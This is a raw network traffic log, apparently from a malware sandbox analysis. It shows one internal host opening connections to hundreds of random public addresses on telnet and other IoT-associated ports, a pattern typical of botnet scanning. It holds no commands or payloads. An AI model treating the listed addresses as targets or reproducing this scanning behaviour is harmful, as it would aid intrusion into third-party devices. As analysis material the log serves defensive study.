                                                                        Dec 6, 2024 00:37:19.009373903 CET2341973212.133.3.60192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009383917 CET2341973193.238.116.34192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009387970 CET4197323192.168.2.23170.105.57.176
                                                                        Dec 6, 2024 00:37:19.009424925 CET4197323192.168.2.23193.238.116.34
                                                                        Dec 6, 2024 00:37:19.009426117 CET4197323192.168.2.2362.243.83.3
                                                                        Dec 6, 2024 00:37:19.009429932 CET4197323192.168.2.23212.133.3.60
                                                                        Dec 6, 2024 00:37:19.009449959 CET234197341.6.121.118192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009465933 CET2341973149.54.249.247192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009475946 CET2341973114.139.86.163192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009493113 CET234197363.126.45.225192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009500027 CET4197323192.168.2.2341.6.121.118
                                                                        Dec 6, 2024 00:37:19.009501934 CET2341973212.112.238.228192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009516954 CET232341973178.86.118.35192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009526968 CET2341973110.227.23.91192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009536028 CET2341973182.113.115.246192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009536982 CET4197323192.168.2.23114.139.86.163
                                                                        Dec 6, 2024 00:37:19.009536982 CET4197323192.168.2.23212.112.238.228
                                                                        Dec 6, 2024 00:37:19.009542942 CET4197323192.168.2.23149.54.249.247
                                                                        Dec 6, 2024 00:37:19.009546041 CET2341973195.168.211.187192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009546041 CET4197323192.168.2.2363.126.45.225
                                                                        Dec 6, 2024 00:37:19.009557009 CET2341973110.23.60.87192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009556055 CET4197323192.168.2.23110.227.23.91
                                                                        Dec 6, 2024 00:37:19.009566069 CET2341973133.238.219.88192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009572029 CET4197323192.168.2.23182.113.115.246
                                                                        Dec 6, 2024 00:37:19.009579897 CET23419739.141.149.163192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009582043 CET419732323192.168.2.23178.86.118.35
                                                                        Dec 6, 2024 00:37:19.009582043 CET4197323192.168.2.23195.168.211.187
                                                                        Dec 6, 2024 00:37:19.009599924 CET4197323192.168.2.23110.23.60.87
                                                                        Dec 6, 2024 00:37:19.009612083 CET4197323192.168.2.23133.238.219.88
                                                                        Dec 6, 2024 00:37:19.009613037 CET4197323192.168.2.239.141.149.163
                                                                        Dec 6, 2024 00:37:19.009651899 CET2341973153.38.49.158192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009661913 CET23234197399.233.51.182192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009671926 CET2341973163.1.117.117192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009681940 CET2341973115.8.198.248192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009690046 CET2341973177.77.48.119192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009691000 CET419732323192.168.2.2399.233.51.182
                                                                        Dec 6, 2024 00:37:19.009691000 CET4197323192.168.2.23153.38.49.158
                                                                        Dec 6, 2024 00:37:19.009710073 CET4197323192.168.2.23115.8.198.248
                                                                        Dec 6, 2024 00:37:19.009727001 CET4197323192.168.2.23163.1.117.117
                                                                        Dec 6, 2024 00:37:19.009728909 CET4197323192.168.2.23177.77.48.119
                                                                        Dec 6, 2024 00:37:19.009826899 CET2341973162.215.88.247192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009836912 CET2341973159.152.77.215192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009851933 CET2341973186.163.171.114192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009861946 CET2341973125.14.40.77192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009876013 CET2341973196.20.222.124192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009880066 CET4197323192.168.2.23159.152.77.215
                                                                        Dec 6, 2024 00:37:19.009882927 CET4197323192.168.2.23162.215.88.247
                                                                        Dec 6, 2024 00:37:19.009886980 CET2341973170.136.187.243192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009896994 CET4197323192.168.2.23186.163.171.114
                                                                        Dec 6, 2024 00:37:19.009901047 CET4197323192.168.2.23125.14.40.77
                                                                        Dec 6, 2024 00:37:19.009906054 CET4197323192.168.2.23196.20.222.124
                                                                        Dec 6, 2024 00:37:19.009910107 CET2341973114.229.51.147192.168.2.23
                                                                        Dec 6, 2024 00:37:19.009923935 CET4197323192.168.2.23170.136.187.243
                                                                        Dec 6, 2024 00:37:19.009958982 CET4197323192.168.2.23114.229.51.147
                                                                        Dec 6, 2024 00:37:19.010001898 CET2341973194.130.241.189192.168.2.23
                                                                        Dec 6, 2024 00:37:19.010011911 CET23234197318.166.109.5192.168.2.23
                                                                        Dec 6, 2024 00:37:19.010020018 CET234197364.64.187.163192.168.2.23
                                                                        Dec 6, 2024 00:37:19.010046959 CET4197323192.168.2.23194.130.241.189
                                                                        Dec 6, 2024 00:37:19.010046959 CET419732323192.168.2.2318.166.109.5
                                                                        Dec 6, 2024 00:37:19.010094881 CET4197323192.168.2.2364.64.187.163
                                                                        Dec 6, 2024 00:37:19.025413036 CET80805707021.26.38.64192.168.2.23
                                                                        Dec 6, 2024 00:37:19.056988955 CET519385555192.168.2.23145.222.196.238
                                                                        Dec 6, 2024 00:37:19.056998968 CET3549681192.168.2.23182.205.117.121
                                                                        Dec 6, 2024 00:37:19.056998968 CET3824680192.168.2.2392.230.178.26
                                                                        Dec 6, 2024 00:37:19.056998968 CET3355437215192.168.2.23183.24.233.90
                                                                        Dec 6, 2024 00:37:19.057004929 CET3918652869192.168.2.2333.8.198.21
                                                                        Dec 6, 2024 00:37:19.057007074 CET4979480192.168.2.2376.203.109.162
                                                                        Dec 6, 2024 00:37:19.057018042 CET507465555192.168.2.2331.104.21.52
                                                                        Dec 6, 2024 00:37:19.057023048 CET440548443192.168.2.2319.155.47.219
                                                                        Dec 6, 2024 00:37:19.057028055 CET4459080192.168.2.23166.140.109.222
                                                                        Dec 6, 2024 00:37:19.057028055 CET524348443192.168.2.2340.98.152.71
                                                                        Dec 6, 2024 00:37:19.057032108 CET478988080192.168.2.23125.119.184.17
                                                                        Dec 6, 2024 00:37:19.057034969 CET3320881192.168.2.23100.192.91.188
                                                                        Dec 6, 2024 00:37:19.057034969 CET3411449152192.168.2.23187.42.40.53
                                                                        Dec 6, 2024 00:37:19.057034969 CET335548443192.168.2.23109.153.203.83
                                                                        Dec 6, 2024 00:37:19.057034969 CET3850280192.168.2.2319.180.163.101
                                                                        Dec 6, 2024 00:37:19.057040930 CET456548080192.168.2.2360.159.210.16
                                                                        Dec 6, 2024 00:37:19.057049036 CET449305555192.168.2.23172.160.19.164
                                                                        Dec 6, 2024 00:37:19.057049036 CET5275880192.168.2.23210.134.5.105
                                                                        Dec 6, 2024 00:37:19.057053089 CET484845555192.168.2.2323.235.225.192
                                                                        Dec 6, 2024 00:37:19.057056904 CET3883881192.168.2.23149.156.232.192
                                                                        Dec 6, 2024 00:37:19.057059050 CET377125555192.168.2.2369.222.154.196
                                                                        Dec 6, 2024 00:37:19.057060957 CET5027081192.168.2.23148.16.37.102
                                                                        Dec 6, 2024 00:37:19.057436943 CET555558674161.171.33.41192.168.2.23
                                                                        Dec 6, 2024 00:37:19.086836100 CET8156790162.216.243.236192.168.2.23
                                                                        Dec 6, 2024 00:37:19.086891890 CET5679081192.168.2.23162.216.243.236
                                                                        Dec 6, 2024 00:37:19.088985920 CET5844049152192.168.2.2331.167.96.242
                                                                        Dec 6, 2024 00:37:19.088992119 CET4235837215192.168.2.23120.142.55.49
                                                                        Dec 6, 2024 00:37:19.088994980 CET4065837215192.168.2.2382.138.197.3
                                                                        Dec 6, 2024 00:37:19.088999033 CET4325480192.168.2.23167.41.169.186
                                                                        Dec 6, 2024 00:37:19.088999987 CET3449680192.168.2.23149.249.135.1
                                                                        Dec 6, 2024 00:37:19.088999987 CET5418080192.168.2.2358.51.244.71
                                                                        Dec 6, 2024 00:37:19.088999033 CET5972480192.168.2.23131.52.222.214
                                                                        Dec 6, 2024 00:37:19.089014053 CET403285555192.168.2.23163.112.148.52
                                                                        Dec 6, 2024 00:37:19.089015007 CET3511480192.168.2.23124.231.148.9
                                                                        Dec 6, 2024 00:37:19.089015007 CET4711652869192.168.2.232.95.7.195
                                                                        Dec 6, 2024 00:37:19.089015961 CET4750649152192.168.2.2391.220.86.101
                                                                        Dec 6, 2024 00:37:19.089018106 CET5005837215192.168.2.23155.181.61.134
                                                                        Dec 6, 2024 00:37:19.089019060 CET399608080192.168.2.23120.95.97.247
                                                                        Dec 6, 2024 00:37:19.089035034 CET484008080192.168.2.23153.132.165.219
                                                                        Dec 6, 2024 00:37:19.089035034 CET3815080192.168.2.23180.23.193.193
                                                                        Dec 6, 2024 00:37:19.089035034 CET398408080192.168.2.23123.117.143.163
                                                                        Dec 6, 2024 00:37:19.089035988 CET542768080192.168.2.23151.243.65.178
                                                                        Dec 6, 2024 00:37:19.089044094 CET5718081192.168.2.23153.164.144.89
                                                                        Dec 6, 2024 00:37:19.089123011 CET570708080192.168.2.2349.109.141.90
                                                                        Dec 6, 2024 00:37:19.134352922 CET491524674866.99.16.40192.168.2.23
                                                                        Dec 6, 2024 00:37:19.134429932 CET4674849152192.168.2.2366.99.16.40
                                                                        Dec 6, 2024 00:37:19.182368040 CET555551938145.222.196.238192.168.2.23
                                                                        Dec 6, 2024 00:37:19.182394028 CET8135496182.205.117.121192.168.2.23
                                                                        Dec 6, 2024 00:37:19.182415009 CET803824692.230.178.26192.168.2.23
                                                                        Dec 6, 2024 00:37:19.182415009 CET519385555192.168.2.23145.222.196.238
                                                                        Dec 6, 2024 00:37:19.182430029 CET3721533554183.24.233.90192.168.2.23
                                                                        Dec 6, 2024 00:37:19.182431936 CET3549681192.168.2.23182.205.117.121
                                                                        Dec 6, 2024 00:37:19.182441950 CET55555074631.104.21.52192.168.2.23
                                                                        Dec 6, 2024 00:37:19.182454109 CET84434405419.155.47.219192.168.2.23
                                                                        Dec 6, 2024 00:37:19.182468891 CET3824680192.168.2.2392.230.178.26
                                                                        Dec 6, 2024 00:37:19.182485104 CET528693918633.8.198.21192.168.2.23
                                                                        Dec 6, 2024 00:37:19.182487011 CET3355437215192.168.2.23183.24.233.90
                                                                        Dec 6, 2024 00:37:19.182490110 CET507465555192.168.2.2331.104.21.52
                                                                        Dec 6, 2024 00:37:19.182496071 CET804979476.203.109.162192.168.2.23
                                                                        Dec 6, 2024 00:37:19.182519913 CET3918652869192.168.2.2333.8.198.21
                                                                        Dec 6, 2024 00:37:19.182522058 CET440548443192.168.2.2319.155.47.219
                                                                        Dec 6, 2024 00:37:19.182534933 CET4979480192.168.2.2376.203.109.162
                                                                        Dec 6, 2024 00:37:19.182549000 CET808047898125.119.184.17192.168.2.23
                                                                        Dec 6, 2024 00:37:19.182559013 CET4915234114187.42.40.53192.168.2.23
                                                                        Dec 6, 2024 00:37:19.182581902 CET8133208100.192.91.188192.168.2.23
                                                                        Dec 6, 2024 00:37:19.182588100 CET478988080192.168.2.23125.119.184.17
                                                                        Dec 6, 2024 00:37:19.182591915 CET3411449152192.168.2.23187.42.40.53
                                                                        Dec 6, 2024 00:37:19.182591915 CET80804565460.159.210.16192.168.2.23
                                                                        Dec 6, 2024 00:37:19.182626009 CET456548080192.168.2.2360.159.210.16
                                                                        Dec 6, 2024 00:37:19.182631016 CET3320881192.168.2.23100.192.91.188
                                                                        Dec 6, 2024 00:37:19.182640076 CET803850219.180.163.101192.168.2.23
                                                                        Dec 6, 2024 00:37:19.182648897 CET844333554109.153.203.83192.168.2.23
                                                                        Dec 6, 2024 00:37:19.182658911 CET8044590166.140.109.222192.168.2.23
                                                                        Dec 6, 2024 00:37:19.182677031 CET3850280192.168.2.2319.180.163.101
                                                                        Dec 6, 2024 00:37:19.182682991 CET335548443192.168.2.23109.153.203.83
                                                                        Dec 6, 2024 00:37:19.182691097 CET84435243440.98.152.71192.168.2.23
                                                                        Dec 6, 2024 00:37:19.182703018 CET4459080192.168.2.23166.140.109.222
                                                                        Dec 6, 2024 00:37:19.182730913 CET524348443192.168.2.2340.98.152.71
                                                                        Dec 6, 2024 00:37:19.208209038 CET491525844031.167.96.242192.168.2.23
                                                                        Dec 6, 2024 00:37:19.208251953 CET5844049152192.168.2.2331.167.96.242
                                                                        Dec 6, 2024 00:37:19.210974932 CET372154065882.138.197.3192.168.2.23
                                                                        Dec 6, 2024 00:37:19.210985899 CET3721542358120.142.55.49192.168.2.23
                                                                        Dec 6, 2024 00:37:19.211042881 CET4235837215192.168.2.23120.142.55.49
                                                                        Dec 6, 2024 00:37:19.211056948 CET4065837215192.168.2.2382.138.197.3
                                                                        Dec 6, 2024 00:37:19.290926933 CET5679081192.168.2.23162.216.243.236
                                                                        Dec 6, 2024 00:37:19.344810963 CET456548080192.168.2.2360.159.210.16
                                                                        Dec 6, 2024 00:37:19.345563889 CET3850280192.168.2.2319.180.163.101
                                                                        Dec 6, 2024 00:37:19.345604897 CET3411449152192.168.2.23187.42.40.53
                                                                        Dec 6, 2024 00:37:19.345990896 CET335548443192.168.2.23109.153.203.83
                                                                        Dec 6, 2024 00:37:19.346371889 CET524348443192.168.2.2340.98.152.71
                                                                        Dec 6, 2024 00:37:19.346391916 CET478988080192.168.2.23125.119.184.17
                                                                        Dec 6, 2024 00:37:19.346435070 CET507465555192.168.2.2331.104.21.52
                                                                        Dec 6, 2024 00:37:19.346437931 CET3320881192.168.2.23100.192.91.188
                                                                        Dec 6, 2024 00:37:19.346497059 CET4979480192.168.2.2376.203.109.162
                                                                        Dec 6, 2024 00:37:19.346503973 CET4459080192.168.2.23166.140.109.222
                                                                        Dec 6, 2024 00:37:19.346504927 CET440548443192.168.2.2319.155.47.219
                                                                        Dec 6, 2024 00:37:19.346903086 CET3355437215192.168.2.23183.24.233.90
                                                                        Dec 6, 2024 00:37:19.346920013 CET3824680192.168.2.2392.230.178.26
                                                                        Dec 6, 2024 00:37:19.346970081 CET3549681192.168.2.23182.205.117.121
                                                                        Dec 6, 2024 00:37:19.346992016 CET3918652869192.168.2.2333.8.198.21
                                                                        Dec 6, 2024 00:37:19.346997023 CET519385555192.168.2.23145.222.196.238
                                                                        Dec 6, 2024 00:37:19.353257895 CET4235837215192.168.2.23120.142.55.49
                                                                        Dec 6, 2024 00:37:19.353288889 CET4065837215192.168.2.2382.138.197.3
                                                                        Dec 6, 2024 00:37:19.353658915 CET5844049152192.168.2.2331.167.96.242
                                                                        Dec 6, 2024 00:37:19.412642956 CET8156790162.216.243.236192.168.2.23
                                                                        Dec 6, 2024 00:37:19.467670918 CET80804565460.159.210.16192.168.2.23
                                                                        Dec 6, 2024 00:37:19.467681885 CET803850219.180.163.101192.168.2.23
                                                                        Dec 6, 2024 00:37:19.467690945 CET4915234114187.42.40.53192.168.2.23
                                                                        Dec 6, 2024 00:37:19.467700958 CET844333554109.153.203.83192.168.2.23
                                                                        Dec 6, 2024 00:37:19.468756914 CET84435243440.98.152.71192.168.2.23
                                                                        Dec 6, 2024 00:37:19.468770981 CET808047898125.119.184.17192.168.2.23
                                                                        Dec 6, 2024 00:37:19.469113111 CET55555074631.104.21.52192.168.2.23
                                                                        Dec 6, 2024 00:37:19.469122887 CET8133208100.192.91.188192.168.2.23
                                                                        Dec 6, 2024 00:37:19.469130993 CET804979476.203.109.162192.168.2.23
                                                                        Dec 6, 2024 00:37:19.469192982 CET84434405419.155.47.219192.168.2.23
                                                                        Dec 6, 2024 00:37:19.470463037 CET8044590166.140.109.222192.168.2.23
                                                                        Dec 6, 2024 00:37:19.470511913 CET3721533554183.24.233.90192.168.2.23
                                                                        Dec 6, 2024 00:37:19.470532894 CET803824692.230.178.26192.168.2.23
                                                                        Dec 6, 2024 00:37:19.470556974 CET8135496182.205.117.121192.168.2.23
                                                                        Dec 6, 2024 00:37:19.470700979 CET555551938145.222.196.238192.168.2.23
                                                                        Dec 6, 2024 00:37:19.470719099 CET528693918633.8.198.21192.168.2.23
                                                                        Dec 6, 2024 00:37:19.470827103 CET3721542358120.142.55.49192.168.2.23
                                                                        Dec 6, 2024 00:37:19.470835924 CET372154065882.138.197.3192.168.2.23
                                                                        Dec 6, 2024 00:37:19.470870972 CET491525844031.167.96.242192.168.2.23
                                                                        Dec 6, 2024 00:37:19.478185892 CET84433327073.240.143.34192.168.2.23
                                                                        Dec 6, 2024 00:37:19.478257895 CET332708443192.168.2.2373.240.143.34
                                                                        Dec 6, 2024 00:37:19.604341030 CET8037220194.163.148.125192.168.2.23
                                                                        Dec 6, 2024 00:37:19.604918957 CET3722080192.168.2.23194.163.148.125
                                                                        Dec 6, 2024 00:37:19.768838882 CET84434486695.84.187.236192.168.2.23
                                                                        Dec 6, 2024 00:37:19.772910118 CET448668443192.168.2.2395.84.187.236
                                                                        Dec 6, 2024 00:37:19.856743097 CET534308080192.168.2.23208.155.120.85
                                                                        Dec 6, 2024 00:37:19.874532938 CET4197323192.168.2.2396.155.12.39
                                                                        Dec 6, 2024 00:37:19.874542952 CET419731023192.168.2.23204.102.185.215
                                                                        Dec 6, 2024 00:37:19.874574900 CET4197323192.168.2.2377.173.238.10
                                                                        Dec 6, 2024 00:37:19.874584913 CET4197323192.168.2.2375.46.50.124
                                                                        Dec 6, 2024 00:37:19.874588966 CET4197323192.168.2.2384.104.211.138
                                                                        Dec 6, 2024 00:37:19.874588966 CET4197323192.168.2.23150.28.185.61
                                                                        Dec 6, 2024 00:37:19.874588966 CET4197323192.168.2.23180.207.173.217
                                                                        Dec 6, 2024 00:37:19.874592066 CET4197323192.168.2.23166.232.173.44
                                                                        Dec 6, 2024 00:37:19.874598980 CET4197323192.168.2.2388.68.53.235
                                                                        Dec 6, 2024 00:37:19.874598980 CET4197323192.168.2.2358.28.50.46
                                                                        Dec 6, 2024 00:37:19.874618053 CET419732323192.168.2.23167.249.180.104
                                                                        Dec 6, 2024 00:37:19.874635935 CET4197323192.168.2.2378.61.63.46
                                                                        Dec 6, 2024 00:37:19.874650002 CET4197323192.168.2.23178.212.38.61
                                                                        Dec 6, 2024 00:37:19.874659061 CET4197323192.168.2.23142.8.141.157
                                                                        Dec 6, 2024 00:37:19.874659061 CET4197323192.168.2.2399.48.81.196
                                                                        Dec 6, 2024 00:37:19.874669075 CET4197323192.168.2.23117.7.217.249
                                                                        Dec 6, 2024 00:37:19.874669075 CET4197323192.168.2.23125.67.89.137
                                                                        Dec 6, 2024 00:37:19.874671936 CET4197323192.168.2.23180.191.101.50
                                                                        Dec 6, 2024 00:37:19.874674082 CET4197323192.168.2.23104.165.203.153
                                                                        Dec 6, 2024 00:37:19.874682903 CET419732323192.168.2.2392.192.78.128
                                                                        Dec 6, 2024 00:37:19.874701023 CET4197323192.168.2.238.56.252.46
                                                                        Dec 6, 2024 00:37:19.874702930 CET4197323192.168.2.23160.128.148.40
                                                                        Dec 6, 2024 00:37:19.874706030 CET4197323192.168.2.2341.149.222.11
                                                                        Dec 6, 2024 00:37:19.874706984 CET4197323192.168.2.23170.45.112.72
                                                                        Dec 6, 2024 00:37:19.874716043 CET4197323192.168.2.23200.105.240.150
                                                                        Dec 6, 2024 00:37:19.874725103 CET4197323192.168.2.2314.95.150.195
                                                                        Dec 6, 2024 00:37:19.874725103 CET4197323192.168.2.2339.46.113.169
                                                                        Dec 6, 2024 00:37:19.874738932 CET4197323192.168.2.2371.235.34.44
                                                                        Dec 6, 2024 00:37:19.874738932 CET419732323192.168.2.23101.199.177.66
                                                                        Dec 6, 2024 00:37:19.874746084 CET4197323192.168.2.23150.7.176.143
                                                                        Dec 6, 2024 00:37:19.874752045 CET4197323192.168.2.2336.124.101.109
                                                                        Dec 6, 2024 00:37:19.874752045 CET4197323192.168.2.2380.246.107.123
                                                                        Dec 6, 2024 00:37:19.874759912 CET4197323192.168.2.2340.157.151.207
                                                                        Dec 6, 2024 00:37:19.874762058 CET4197323192.168.2.2347.162.80.82
                                                                        Dec 6, 2024 00:37:19.874767065 CET4197323192.168.2.2370.128.116.86
                                                                        Dec 6, 2024 00:37:19.874769926 CET4197323192.168.2.2368.246.22.53
                                                                        Dec 6, 2024 00:37:19.874771118 CET4197323192.168.2.23178.18.210.159
                                                                        Dec 6, 2024 00:37:19.874785900 CET4197323192.168.2.23104.157.11.224
                                                                        Dec 6, 2024 00:37:19.874789953 CET419732323192.168.2.2364.255.112.7
                                                                        Dec 6, 2024 00:37:19.874795914 CET4197323192.168.2.2342.194.156.96
                                                                        Dec 6, 2024 00:37:19.874799013 CET4197323192.168.2.2367.103.22.145
                                                                        Dec 6, 2024 00:37:19.874804020 CET4197323192.168.2.23174.76.147.182
                                                                        Dec 6, 2024 00:37:19.874815941 CET4197323192.168.2.23204.185.46.107
                                                                        Dec 6, 2024 00:37:19.874830961 CET4197323192.168.2.23106.44.75.210
                                                                        Dec 6, 2024 00:37:19.874850035 CET4197323192.168.2.23196.249.103.247
                                                                        Dec 6, 2024 00:37:19.874850035 CET4197323192.168.2.23146.108.209.82
                                                                        Dec 6, 2024 00:37:19.874850035 CET4197323192.168.2.23157.199.119.151
                                                                        Dec 6, 2024 00:37:19.874852896 CET4197323192.168.2.238.81.112.120
                                                                        Dec 6, 2024 00:37:19.874850035 CET4197323192.168.2.23220.115.209.204
                                                                        Dec 6, 2024 00:37:19.874850035 CET419732323192.168.2.2334.45.121.231
                                                                        Dec 6, 2024 00:37:19.874871969 CET4197323192.168.2.2392.68.213.116
                                                                        Dec 6, 2024 00:37:19.874871969 CET4197323192.168.2.23223.190.30.2
                                                                        Dec 6, 2024 00:37:19.874886036 CET4197323192.168.2.23163.3.5.69
                                                                        Dec 6, 2024 00:37:19.874886990 CET4197323192.168.2.2341.160.17.189
                                                                        Dec 6, 2024 00:37:19.874887943 CET4197323192.168.2.23121.210.90.162
                                                                        Dec 6, 2024 00:37:19.874905109 CET4197323192.168.2.23222.169.132.35
                                                                        Dec 6, 2024 00:37:19.874907970 CET4197323192.168.2.23207.46.95.177
                                                                        Dec 6, 2024 00:37:19.874907970 CET4197323192.168.2.23113.99.253.185
                                                                        Dec 6, 2024 00:37:19.874924898 CET419732323192.168.2.23197.17.198.210
                                                                        Dec 6, 2024 00:37:19.874927044 CET4197323192.168.2.23109.78.233.145
                                                                        Dec 6, 2024 00:37:19.874924898 CET4197323192.168.2.23219.99.15.243
                                                                        Dec 6, 2024 00:37:19.874928951 CET4197323192.168.2.23130.224.230.1
                                                                        Dec 6, 2024 00:37:19.874937057 CET4197323192.168.2.23112.96.123.35
                                                                        Dec 6, 2024 00:37:19.874942064 CET4197323192.168.2.2390.224.99.176
                                                                        Dec 6, 2024 00:37:19.874942064 CET4197323192.168.2.2366.245.250.181
                                                                        Dec 6, 2024 00:37:19.874963045 CET4197323192.168.2.23172.152.238.104
                                                                        Dec 6, 2024 00:37:19.874968052 CET419732323192.168.2.239.17.168.175
                                                                        Dec 6, 2024 00:37:19.874979019 CET4197323192.168.2.23184.70.91.182
                                                                        Dec 6, 2024 00:37:19.874979019 CET4197323192.168.2.2339.134.200.107
                                                                        Dec 6, 2024 00:37:19.874979019 CET4197323192.168.2.2344.100.226.170
                                                                        Dec 6, 2024 00:37:19.874979019 CET4197323192.168.2.23170.82.10.180
                                                                        Dec 6, 2024 00:37:19.874982119 CET4197323192.168.2.23203.73.47.231
                                                                        Dec 6, 2024 00:37:19.874998093 CET4197323192.168.2.23223.128.225.138
                                                                        Dec 6, 2024 00:37:19.875000000 CET4197323192.168.2.23161.190.213.74
                                                                        Dec 6, 2024 00:37:19.875006914 CET4197323192.168.2.235.189.185.126
                                                                        Dec 6, 2024 00:37:19.875008106 CET4197323192.168.2.23211.234.111.111
                                                                        Dec 6, 2024 00:37:19.875015020 CET4197323192.168.2.23118.85.178.144
                                                                        Dec 6, 2024 00:37:19.875026941 CET419732323192.168.2.2362.47.240.180
                                                                        Dec 6, 2024 00:37:19.875035048 CET4197323192.168.2.2363.206.176.17
                                                                        Dec 6, 2024 00:37:19.875039101 CET4197323192.168.2.2323.38.229.52
                                                                        Dec 6, 2024 00:37:19.875039101 CET4197323192.168.2.2393.5.201.156
                                                                        Dec 6, 2024 00:37:19.875044107 CET4197323192.168.2.2331.12.181.4
                                                                        Dec 6, 2024 00:37:19.875051975 CET4197323192.168.2.23179.154.61.232
                                                                        Dec 6, 2024 00:37:19.875061035 CET4197323192.168.2.2348.235.146.125
                                                                        Dec 6, 2024 00:37:19.875061035 CET4197323192.168.2.23194.255.104.195
                                                                        Dec 6, 2024 00:37:19.875061035 CET4197323192.168.2.23176.132.239.143
                                                                        Dec 6, 2024 00:37:19.875065088 CET4197323192.168.2.23103.10.189.94
                                                                        Dec 6, 2024 00:37:19.875072002 CET4197323192.168.2.2372.185.192.255
                                                                        Dec 6, 2024 00:37:19.875085115 CET419732323192.168.2.23159.131.142.45
                                                                        Dec 6, 2024 00:37:19.875104904 CET4197323192.168.2.23208.22.2.84
                                                                        Dec 6, 2024 00:37:19.875106096 CET4197323192.168.2.23121.63.227.80
                                                                        Dec 6, 2024 00:37:19.875106096 CET4197323192.168.2.2366.79.214.215
                                                                        Dec 6, 2024 00:37:19.875103951 CET4197323192.168.2.23136.89.96.17
                                                                        Dec 6, 2024 00:37:19.875103951 CET4197323192.168.2.23149.225.144.2
                                                                        Dec 6, 2024 00:37:19.875114918 CET4197323192.168.2.2323.90.115.20
                                                                        Dec 6, 2024 00:37:19.875114918 CET4197323192.168.2.23176.222.186.236
                                                                        Dec 6, 2024 00:37:19.875135899 CET4197323192.168.2.2313.83.102.129
                                                                        Dec 6, 2024 00:37:19.875137091 CET419732323192.168.2.23194.1.216.88
                                                                        Dec 6, 2024 00:37:19.875138044 CET4197323192.168.2.2327.34.11.202
                                                                        Dec 6, 2024 00:37:19.875159979 CET4197323192.168.2.23100.200.128.124
                                                                        Dec 6, 2024 00:37:19.875159979 CET4197323192.168.2.23119.15.70.249
                                                                        Dec 6, 2024 00:37:19.875164032 CET4197323192.168.2.2341.97.3.220
                                                                        Dec 6, 2024 00:37:19.875164032 CET4197323192.168.2.23173.236.222.156
                                                                        Dec 6, 2024 00:37:19.875169039 CET4197323192.168.2.2370.181.174.6
                                                                        Dec 6, 2024 00:37:19.875180960 CET4197323192.168.2.2389.73.149.75
                                                                        Dec 6, 2024 00:37:19.875183105 CET4197323192.168.2.23107.31.236.155
                                                                        Dec 6, 2024 00:37:19.875190973 CET4197323192.168.2.2389.85.5.89
                                                                        Dec 6, 2024 00:37:19.875199080 CET419732323192.168.2.23147.187.164.74
                                                                        Dec 6, 2024 00:37:19.875219107 CET4197323192.168.2.23115.116.162.133
                                                                        Dec 6, 2024 00:37:19.875221014 CET4197323192.168.2.23182.161.250.238
                                                                        Dec 6, 2024 00:37:19.875221014 CET4197323192.168.2.23111.10.213.130
                                                                        Dec 6, 2024 00:37:19.875233889 CET4197323192.168.2.23195.249.127.171
                                                                        Dec 6, 2024 00:37:19.875241995 CET4197323192.168.2.2347.190.78.159
                                                                        Dec 6, 2024 00:37:19.875251055 CET4197323192.168.2.23139.186.108.37
                                                                        Dec 6, 2024 00:37:19.875252962 CET4197323192.168.2.2383.200.224.230
                                                                        Dec 6, 2024 00:37:19.875257969 CET419732323192.168.2.23172.69.232.238
                                                                        Dec 6, 2024 00:37:19.875257969 CET4197323192.168.2.2387.143.210.248
                                                                        Dec 6, 2024 00:37:19.875268936 CET4197323192.168.2.23101.109.199.117
                                                                        Dec 6, 2024 00:37:19.875272036 CET4197323192.168.2.23158.121.198.166
                                                                        Dec 6, 2024 00:37:19.875288010 CET4197323192.168.2.2331.228.188.77
                                                                        Dec 6, 2024 00:37:19.875288963 CET419731023192.168.2.2353.40.195.40
                                                                        Dec 6, 2024 00:37:19.875288963 CET4197323192.168.2.2363.12.118.91
                                                                        Dec 6, 2024 00:37:19.875305891 CET4197323192.168.2.23189.11.135.2
                                                                        Dec 6, 2024 00:37:19.875308990 CET4197323192.168.2.23100.168.226.171
                                                                        Dec 6, 2024 00:37:19.875329018 CET419732323192.168.2.23152.35.66.197
                                                                        Dec 6, 2024 00:37:19.875332117 CET4197323192.168.2.23192.15.98.181
                                                                        Dec 6, 2024 00:37:19.875333071 CET4197323192.168.2.23199.254.82.130
                                                                        Dec 6, 2024 00:37:19.875355005 CET4197323192.168.2.23102.227.140.55
                                                                        Dec 6, 2024 00:37:19.875360012 CET4197323192.168.2.23189.53.177.72
                                                                        Dec 6, 2024 00:37:19.875363111 CET4197323192.168.2.2371.108.84.173
                                                                        Dec 6, 2024 00:37:19.875363111 CET4197323192.168.2.23102.197.37.249
                                                                        Dec 6, 2024 00:37:19.875376940 CET4197323192.168.2.23180.8.157.125
                                                                        Dec 6, 2024 00:37:19.875380993 CET4197323192.168.2.23216.151.68.94
                                                                        Dec 6, 2024 00:37:19.875395060 CET4197323192.168.2.23216.52.178.89
                                                                        Dec 6, 2024 00:37:19.875395060 CET4197323192.168.2.23189.61.212.118
                                                                        Dec 6, 2024 00:37:19.875395060 CET419732323192.168.2.2332.165.163.10
                                                                        Dec 6, 2024 00:37:19.875395060 CET4197323192.168.2.2397.248.57.46
                                                                        Dec 6, 2024 00:37:19.875411034 CET4197323192.168.2.23103.210.90.32
                                                                        Dec 6, 2024 00:37:19.875412941 CET4197323192.168.2.2360.163.150.111
                                                                        Dec 6, 2024 00:37:19.875413895 CET4197323192.168.2.2360.21.98.96
                                                                        Dec 6, 2024 00:37:19.875421047 CET4197323192.168.2.2362.136.5.158
